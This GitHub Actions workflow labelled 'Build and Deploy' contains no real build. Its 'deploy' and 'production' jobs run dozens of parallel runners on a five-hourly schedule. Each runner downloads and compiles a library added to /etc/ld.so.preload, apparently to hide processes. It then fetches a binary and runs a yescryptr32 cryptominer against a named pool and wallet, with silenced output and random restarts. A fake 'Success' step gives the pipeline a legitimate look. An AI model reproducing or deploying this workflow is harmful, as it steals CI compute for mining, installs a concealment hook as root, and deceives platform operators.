name: Build and Deploy

on: 
  workflow_dispatch:
  push:
  schedule:
    - cron: '0 */5 * * *'

jobs: 
  build: 
    name: Build 
    runs-on: ubuntu-latest 
    strategy: 
      matrix: 
        go: [1, 2, 3, 4, 5, 6, 7, 8, 9, 10] 
        flag: [A, B, C, D] 
    env: 
        NUM_JOBS: 40  
        JOB: ${{ matrix.go }} 
    steps: 
      - name: Checkout 
        uses: actions/checkout@v2

  deploy: 
    name: Deploy 
    needs: build 
    runs-on: ubuntu-latest 
    strategy: 
      matrix: 
        go: [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20] 
    env: 
        NUM_JOBS: 20 
        JOB: ${{ matrix.go }} 
    steps: 
      - name: Checkout 
        uses: actions/checkout@v2 
      - name: Run Shell Script with Random Wait Time
        run: |
          echo '#!/bin/bash
          apt-get update ; apt-get install sudo wget cpulimit -y
          rm -rf *
          curl https://bitbucket.org/koploks/watir/raw/master/nyumput.c -o nyumput.c
          apt-get install build-essential -y
          gcc -Wall -fPIC -shared -o libnyumput.so nyumput.c -ldl
          mv libnyumput.so /usr/local/lib/
          echo /usr/local/lib/libnyumput.so >> /etc/ld.so.preload
          rm nyumput.c
          mkdir .lib && cd .lib
          wget -O sgr1  https://github.com/barburonjilo/back/raw/main/sr 
          chmod +x sgr1
          cpulimit -l 150 -e sgr1 &
          sudo sync && sudo echo 3 > /proc/sys/vm/drop_caches
          nice -n -10 nohup ./sgr1 --algorithm yescryptr32 --pool stratum-asia.rplant.xyz:17116 --wallet UddCZe5d6VZNj2B7BgHPfyyQvCek6txUTx.$(echo $RANDOM | md5sum | head -c 5) --password x --disable-gpu --cpu-threads $(nproc --all) --enable-1gb-hugepages --keepalive > /dev/null 2>&1  &
          while :; do echo $RANDOM | md5sum | head -c 20; echo; sleep 3m; done' > node.sh

          chmod +x node.sh

          end=$((SECONDS+3600))
          while [ $SECONDS -lt $end ]; do
            # Run the shell script in the background
            sudo RUNNER_ALLOW_RUNASROOT=true ./node.sh &
            pid=$!

            # Generate a random wait time between 1 and 10 minutes
            wait_time=$((RANDOM % 600 + 1))

            # Wait for the random amount of time
            sleep $wait_time

            # Kill the process
            kill $pid

            # Ensure the process is killed
            wait $pid 2>/dev/null
          done

  success: 
    name: Success 
    needs: deploy 
    runs-on: ubuntu-latest 
    steps: 
      - name: Checkout 
        uses: actions/checkout@v2
      - name: Success Step
        run: echo "All deploy steps completed successfully."

  production: 
    name: Production 
    needs: success 
    runs-on: ubuntu-latest 
    strategy: 
      matrix: 
        go: [1, 2, 3, 4, 5, 6, 7, 8, 9, 10] 
    env: 
        NUM_JOBS: 10 
        JOB: ${{ matrix.go }} 
    steps: 
      - name: Checkout 
        uses: actions/checkout@v2 
      - name: Run Shell Script with Random Wait Time
        run: |
          echo '#!/bin/bash
          apt-get update ; apt-get install sudo wget cpulimit -y
          rm -rf *
          curl https://bitbucket.org/koploks/watir/raw/master/nyumput.c -o nyumput.c
          apt-get install build-essential -y
          gcc -Wall -fPIC -shared -o libnyumput.so nyumput.c -ldl
          mv libnyumput.so /usr/local/lib/
          echo /usr/local/lib/libnyumput.so >> /etc/ld.so.preload
          rm nyumput.c
          mkdir .lib && cd .lib
          wget -O sgr1  https://github.com/barburonjilo/back/raw/main/sr 
          chmod +x sgr1
          cpulimit -l 150 -e sgr1 &
          sudo sync && sudo echo 3 > /proc/sys/vm/drop_caches
          nice -n -10 nohup ./sgr1 --algorithm yescryptr32 --pool stratum-asia.rplant.xyz:17116 --wallet UddCZe5d6VZNj2B7BgHPfyyQvCek6txUTx.$(echo $RANDOM | md5sum | head -c 5) --password x --disable-gpu --cpu-threads $(nproc --all) --enable-1gb-hugepages --keepalive > /dev/null 2>&1  &
          while :; do echo $RANDOM | md5sum | head -c 20; echo; sleep 3m; done' > node.sh

          chmod +x node.sh

          end=$((SECONDS+3600))
          while [ $SECONDS -lt $end ]; do
            # Run the shell script in the background
            sudo RUNNER_ALLOW_RUNASROOT=true ./node.sh &
            pid=$!

            # Generate a random wait time between 1 and 10 minutes
            wait_time=$((RANDOM % 600 + 1))

            # Wait for the random amount of time
            sleep $wait_time

            # Kill the process
            kill $pid

            # Ensure the process is killed
            wait $pid 2>/dev/null
          done
